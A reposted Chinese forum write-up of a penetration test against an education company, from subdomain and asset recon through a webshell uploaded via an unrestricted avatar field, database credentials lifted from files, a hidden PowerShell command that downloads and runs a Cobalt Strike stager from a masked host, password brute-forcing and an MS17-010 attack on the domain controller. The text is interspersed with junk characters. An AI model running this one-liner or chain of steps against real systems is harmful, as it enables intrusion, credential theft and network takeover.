中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

9 _/ h! o; h- V: U* q8 \" O/ i 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 + y U$ p" \ z9 G

4 K7 m S# _& @

- V ]! J3 u% t0 q; }1 g" B. i  ; v) a% ^' n, ]& E

, `( l! a+ {+ t& b8 Z( c

- A6 g; Z, f; `) r9 a$ ?+ q 正文 5 [- m$ s% x' h, K, r+ i" x6 C/ o. x

8 |3 i$ r2 ~( C$ b: z

" [( K" x" a! v7 i3 t  , w0 \# O! K e+ e" W+ r2 ^8 R

( `0 X1 U! j" n3 F

6 x3 A( A" r) F, r& _ 目标:www.xxxx.com(一家教育机构)
% c: a3 t1 Z! Y$ H# ] 打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 0 b( z" d. B; Y V

' O" g1 Y2 z& a! r; F/ p( f

' F' R& [0 V; U. z vshapes= 3 l0 X8 {5 [( N+ d6 \

1 a! ?+ u/ I: J+ p' N6 x

* A k/ `( {3 U) w# ^ 进行了简单的信息搜集
q+ d0 b0 i, |/ }& i2 B$ e" A
0 C* ?( j2 ]3 u - _6 E+ U* c; ]5 O: S

+ G S* ~& X5 w, m

" G3 }: u6 l# { 子域名搜集 * w% J6 P `2 g1 H( j$ O

2 t4 P6 v( v b* v

, z( [9 K- ^8 P- ~5 x vshapes=" C3 g7 a" z1 w/ q

; f; x( |2 t: R3 K# F6 Y

7 K% @' K$ P$ S2 m0 s( V: } fofa找资产
9 d! @. B* q$ c3 a( z/ p# x
! [6 S0 S& F$ l+ R0 k; t; A) [- [ " ^9 B7 E0 l) {5 c7 z: Y9 m

* E. l8 S g! E; [% E H# u7 n& d

' \' c g `: {9 J3 p vshapes= \/ l% f# s) I, y! o" h0 q

% {4 K) k9 Y0 n# q( H; |

% m+ Q2 t% s+ G- z) V/ u 一共七个资产。去重之后只有两个。
9 f3 @6 o# ] z, A9 X
6 [- V) A: h$ e/ c, j ; j$ i7 C# a( f" x4 j+ k% W h

- o# z3 n9 k% ~7 J$ I# e

. S8 ^! m4 `2 m! @ d 目录探测 + q/ Q: J0 r1 r) I$ I, l4 ^) l( r

6 I- J; d6 a: J! y1 t7 z0 E0 Z$ Y

$ ], ]5 ]9 N& P k' k vshapes= % k i, P% g1 m9 V' M4 |- l

, V3 `4 Y3 a' L1 }

7 w [7 d5 @5 m+ M$ X4 M6 D$ F 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% @. Y1 }: U" T
. u. o3 n+ c9 i . U S3 o. T# Q7 w5 e+ y

6 l7 B7 ~* c4 I% J

5 G$ W5 {4 W' @7 E* k. |) ^ 我又尝试了通过修改返回包来绕过登录界面 * R0 `* B$ d* j/ T$ w/ y

( J' d7 e( T% Q1 g

: v3 w4 n' v! [7 [6 A" V vshapes= 7 G L+ |7 M' ^. K0 R% ^4 U) f

/ N [" Z' s* L D, w+ a/ n

% \; L0 {! L4 W 还是不行,尝试注入无果7 v5 ]& p+ i9 E: P/ ^

. D- G5 p" k4 y5 c; J$ _# \9 \

+ u; @; r! `# H( ^7 a- L+ p vshapes= H& @$ Y$ N1 ~6 j$ A, b

( y4 ?! h/ ]6 M0 y: V, Q

) R! h- u! e0 V4 d& O" } 不过我目录探测出了一处Spring信息泄露
" I' R! T1 i6 |5 I1 {2 Q
3 @8 I7 E u8 Y0 E9 l* A 7 ^) F/ _# Y' j* n, R8 J

" V) F0 O5 i4 e) H+ B' R

8 r) ]/ o3 q0 v$ D$ G3 F2 V& _2 o vshapes=4 k+ n& {+ V( ?. S

: ?$ K; A( Z6 U

4 W3 z6 s: I6 D, L. Z; z 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 , l4 r; _* Y! l2 L( C2 V: h

- @" r0 u3 V- C

- z5 m" i& I* L7 H) v" q vshapes=. N' M. Y4 @- M0 d3 k/ r( L* S

& Q, c1 i) M. ^

# c! L" p9 I1 B1 d- T" \; q1 R 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 7 O4 C3 y0 |2 u' g9 W2 m- ` i; m

9 E3 ~+ L# ?$ u/ ]

2 M W6 K! {& r vshapes=, ]& y; y3 x/ |

! h. G8 u. f; N

7 o2 w$ N0 r" {& D! X& S! b& G 获取有些师傅到这一步就手机抓包电脑测了。 - g h d; C# s6 ?5 C

+ j' r2 X/ k- K; q) X6 l! o

* N7 p' w7 ^# b Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。3 m3 L7 N$ z, B( \; K

) ?) O* q, j1 R- g* @* A

4 v0 y" o- |3 E: F8 i- N 其中在一个公众号发现了小程序,可以进行注册。2 s. n: C: D d! t

1 g! P( D4 m/ O6 t( N

$ K4 D, C2 ]0 l5 }* P3 e 看到了头像上传,尝试上传获取WebShell6 C9 i7 Q9 f: f ^1 e# W

% T( b' O/ i& \

8 g8 }/ o7 g, S+ z% N1 A* Q8 R vshapes=7 F/ a. v5 A$ A9 B

6 f/ V: o0 [4 N: v7 X

( R7 J" d n, T$ P& f 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问, x. c6 |. V. H8 A

* o" l. p# O( E( b1 M4 q1 x

& G! m! }: o/ K! T4 ^/ H/ u vshapes=( f7 B/ D$ T& X7 K; h/ |

& H! X7 ~$ C9 v2 o

$ s& n; B& V w* r+ w3 r! A 然后上了大马. r% {) b7 n$ O6 `, a! U- b

5 o1 v7 z) m6 C4 E3 T B7 ^: U( `: j$ ?

8 \3 J; H; o3 Z' s$ A) v" F# V5 A# A vshapes= 9 y1 d2 B9 q$ d/ L

. Z: f+ @. y( } z# l5 B, j

1 i' I5 U- R4 k# C, p0 [ vshapes= 0 N) }( k7 E; G0 V; H; e$ E

( r; |" w: Z7 N

! o+ F6 v& E5 D$ c! I x 通过翻找文件发现数据库账号密码0 I4 q7 Z7 X5 T5 H% |# p& ?

6 b( a y" w. i% @$ q

* K3 B$ {6 p5 A8 b d! D7 Y! z vshapes= * z! u( l# F+ ?( O, F

& R4 V" L0 I9 c6 x: _ n+ g8 Z6 `1 r1 E3 ]

- }* s; B; V% g# Y. f --内网渗透" C: Y; G- m( m5 I! R' ~

; }3 I, m. O7 x: y/ |

' n, ]% J' u+ J, z5 {3 I% T2 [: L 直接通过powershell执行 cs上线& } m+ w2 j/ r. T- {/ @/ Z0 I

& y9 f ?1 k- h& C, c

1 D+ P$ D" A4 L- w powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"# t! U+ u" _- ~

9 y0 S% s1 l/ ]

, x; c7 Z$ M$ [! j9 H vshapes=# O7 Y) A* [6 [% v2 s

$ w+ s) s- U" B$ q5 m5 L2 j

% L. n4 a2 f h/ ]+ J 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破. _" q+ B! \' e" Q; t& A

/ e4 l- `/ W, V

^3 T: |$ X1 J: T vshapes=) i/ O: L, v" Q. v/ }8 h8 d

* q$ R5 z9 d$ Y% q+ w- _- D- z/ ^

% Y+ N7 {8 J, D2 Z W 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 F. U& t# [* @+ a
6 Z- y" v6 y6 M9 y4 Z" z
; ?- v1 d' S7 k) w. r5 W ' p) V8 r/ K X, F3 I3 `

! Y0 k3 ~9 }: W: x

6 l, a: p( V. V6 |* N5 { vshapes=) y- h$ g* @/ n, j: |

5 D3 p' I4 @9 y- H r+ G7 F

% n+ e4 v. Y3 E h 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 Q0 t& F5 R- h9 W7 A7 ~
4 J4 p. b$ Z3 s4 v * s8 F' k* |& Q7 @

& p, f2 x8 J9 [$ }- J, ~

3 @% e" b+ r8 n3 j$ r' [ vshapes=2 {& v+ C7 p: j8 I( T0 U$ u/ Q

* A' m ~3 v! [. A" Q; o) U# t- P

, Y) @0 R( v7 D6 c s) y+ e$ t6 S7 d
6 H1 G; i) ^' \+ [. H' ~/ _
7 g# `+ }4 D- h) R0 B$ K1 m# |; M5 J . k! `* o: p( @0 S: v

; i8 p# S/ `: x l' l' o5 a

% H8 E9 ~; W- `0 J- d   - T1 _- ]; S3 p P6 Y

. P* t" H5 R3 ~1 c: S& d

i5 R0 B& @7 c/ z9 e5 c 小结 ) M9 k" [' @9 R

2 m$ c; F* J2 Q3 R5 e1 K- v

5 j& J' b3 W* _. `  1 H7 c) D- `, H6 q

8 d9 y2 G3 X7 C+ t

" ~, k! [5 X- A) s 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 1 X' d& W, }- o5 c2 E/ j4 N( k

* n# ?- {9 M' R# T' K3 I

; j8 `/ }- o7 Y( T5 x  7 E7 a: `' L) {

- E" }8 C9 \( T1 i ; `! e& |. o1 i, ~: ?7 b/ O

1 l& V0 J% o& A" k2 @ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 9 N) ~: F/ S' J" X. E

3 }: Y# m1 Q' R* l9 B7 y' L

6 s! ^8 D# X+ Z* [   # Y) f. A- a) K& c4 D





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2